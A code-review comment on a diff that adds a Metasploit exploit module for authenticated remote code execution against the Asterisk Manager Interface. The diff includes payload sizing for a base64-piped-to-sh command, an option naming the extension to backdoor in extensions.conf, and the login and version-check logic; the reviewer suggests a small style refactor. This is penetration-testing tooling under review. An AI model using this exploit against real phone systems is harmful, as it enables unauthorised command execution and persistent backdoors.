modules/exploits/linux/misc/asterisk_ami_originate_auth_rce.rb

```diff
@@ -0,0 +1,215 @@
+        # 'Payload' => {
+        #  # ; is a comment in the extensions.conf file
+        #  'BadChars' => ";\r\n:\"" # https://docs.asterisk.org/Configuration/Interfaces/Asterisk-Manager-Interface-AMI/AMI-v2-Specification/#message-layout
+        # },
+
+        # 927 characters (w/o padding) is the max (Error, Message: Failed to parse message: line too long)
+        # `echo "" | base64 -d | sh` == 19 characters
+        # chatGPT says 908 b64 encoded characters makes 681 pre-encoding.
+        'Payload' => {
+          'Space' => 681
+        },
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_command
+            }
+          ],
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2024-08-08',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
+        'DefaultTarget' => 0,
+        'License' => MSF_LICENSE
+      )
+    )
+    register_options [
+      OptString.new('CONF', [true, 'The extensions configuration file location', '/etc/asterisk/extensions.conf']),
+      OptString.new('PARKINGLOT', [true, 'The extensions and name of the parking lot', '70@parkedcalls']),
+      OptString.new('EXTENSION', [true, 'The extension number to backdoor', Rex::Text.rand_text_numeric(3..5)]),
+    ]
+    register_advanced_options [
+      OptInt.new('TIMEOUT', [true, 'Timeout value between AMI commands', 1]),
+    ]
+  end
+
+  def conn?
+    vprint_status 'Connecting...'
+
+    connect
+    banner = sock.get_once
+
+    unless banner =~ %r{Asterisk Call Manager/([\d.]+)}
+      fail_with Failure::BadConfig, 'Asterisk Call Manager does not appear to be running'
+    end
+
+    print_status "Found Asterisk Call Manager version #{::Regexp.last_match(1)}"
+
+    unless login(datastore['USERNAME'], datastore['PASSWORD'])
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good 'Authenticated successfully'
+    true
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+    print_error e.message
+    false
+  end
+
+  def check
+    # why don't we check the version numbers?
+    # we're connecting to Asterisk Call Manager, which seems to be a sub component
+    # of asterisk and therefore the version numbers don't line up. For instance
+    # Asterisk 19.8.0 (provided by freepbx SNG7-PBX16-64bit-2302-1.iso)
+    # uses Asterisk Call Manager version 8.0.2.
+    success = conn?
+    return CheckCode::Unknown('Unable to connect to Asterisk AMI service') unless success
+
+    version = get_asterisk_version
+    disconnect
+    if !version
+      return CheckCode::Detected('Able to connect, unable to determine version')
+    elsif version.between?(Rex::Version.new('18.16.0'), Rex::Version.new('18.24.2')) ||
```

Comment:
```suggestion
    return CheckCode::Detected('Able to connect, unable to determine version') unless version
    
    if version.between?(Rex::Version.new('18.16.0'), Rex::Version.new('18.24.2')) ||
```

To make the code a bit more consistent